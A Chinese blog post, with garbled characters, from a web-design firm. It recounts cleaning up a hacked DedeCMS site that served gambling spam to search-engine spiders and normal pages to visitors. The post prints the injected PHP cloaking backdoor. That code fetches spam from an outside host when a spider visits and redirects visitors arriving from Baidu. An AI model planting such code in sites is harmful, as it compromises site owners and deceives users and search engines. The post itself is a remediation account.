2021-12-19 分類: 網(wǎng)站建設(shè)
前天 QQ上收到一個(gè)朋友發(fā)來的消息,問我在嗎,我一看是創(chuàng)業(yè)園時(shí)候的朋友,就聊了起來,他所在的公司的客戶的網(wǎng)站被入侵了
但是他和我說 他的那個(gè)客戶的網(wǎng)站不是這類的,和這個(gè)一點(diǎn)關(guān)系都沒有,我打開了域名看到的實(shí)際內(nèi)容是
是一個(gè)商業(yè)網(wǎng)站,這時(shí)候我的思路很清晰了,首先可以確定的是人和蜘蛛看到的內(nèi)容不一樣,這也是常用黑帽手法,這樣可以獲取大量的外鏈,為了進(jìn)一步確認(rèn)的我思路,我決定用蜘蛛模擬器試試結(jié)果如下圖:
果然和我想的是一樣的,這就證明了我的猜想,這種一般就是在網(wǎng)站根目錄添加一個(gè)畸形文件,讓這個(gè)畸形文件無法刪除
并且優(yōu)先級要高于網(wǎng)站本身的權(quán)限,或者是在網(wǎng)站的默認(rèn)文件檔里面加上一段代碼,來調(diào)用他的文件,來判斷來的人還是蜘蛛
如果是蜘蛛就給它顯示博采的內(nèi)容,如果是人就顯示正常的頁面,在了FTP帳號密碼 進(jìn)行一步檢查,
發(fā)現(xiàn)用的是我的第二種手法, 在文件內(nèi)加入了以下PHP代碼
$file="http://www.aoxsys.net/seo/3.html";
$referer=$_SERVER["HTTP_REFERER"];
$agent= strtolower($_SERVER["HTTP_USER_aGENT"]);
if(strstr($referer,"baidu")&&strstr($referer,"456"))
{
Header("Location: $url");
}
if ( ereg( "http://www.aoxsys.net/search/spider.htm",$agent ))
{
$content=file_get_contents($file);
echo $content;
exit;
}
>
< php
這個(gè)代碼明白的一看就知道了吧,我就不解釋了,在根目錄還發(fā)現(xiàn)一個(gè)加密的文件,那個(gè)文件貌似是博采的網(wǎng)頁內(nèi)容,命名為index.asp.asp 接下來就是替換INDEX.PHP文件 然后刪除相關(guān)后門,打上補(bǔ)丁,
但是當(dāng)我拿到網(wǎng)站后臺的帳號密碼的時(shí)候我崩潰了,密碼竟然 是默認(rèn)的,帳號也是默認(rèn)的,程序是DEDE 存在安全漏洞
修補(bǔ)漏洞 用DEDE的安全檢測工具稍微檢查了一下木馬和WEBSHELL 沒有多余發(fā)現(xiàn),打上補(bǔ)丁收工,再用蜘蛛模擬器查看
網(wǎng)站內(nèi)容和蜘蛛的爬行內(nèi)容一致了 接下來就是@蜘蛛了 讓蜘蛛過來爬 收錄并更新快照 什么怎么@蜘蛛嗎 這你都不會嗎
那我也不會 嘿嘿!
網(wǎng)站標(biāo)題:解決網(wǎng)站快照與網(wǎng)站實(shí)際內(nèi)容不符
文章起源:http://www.rwnh.cn/news2/141052.html
成都網(wǎng)站建設(shè)公司_創(chuàng)新互聯(lián),為您提供電子商務(wù)、標(biāo)簽優(yōu)化、網(wǎng)站內(nèi)鏈、移動網(wǎng)站建設(shè)、定制開發(fā)、全網(wǎng)營銷推廣
聲明:本網(wǎng)站發(fā)布的內(nèi)容(圖片、視頻和文字)以用戶投稿、用戶轉(zhuǎn)載內(nèi)容為主,如果涉及侵權(quán)請盡快告知,我們將會在第一時(shí)間刪除。文章觀點(diǎn)不代表本網(wǎng)站立場,如需處理請聯(lián)系客服。電話:028-86922220;郵箱:631063699@qq.com。內(nèi)容未經(jīng)允許不得轉(zhuǎn)載,或轉(zhuǎn)載時(shí)需注明來源: 創(chuàng)新互聯(lián)
猜你還喜歡下面的內(nèi)容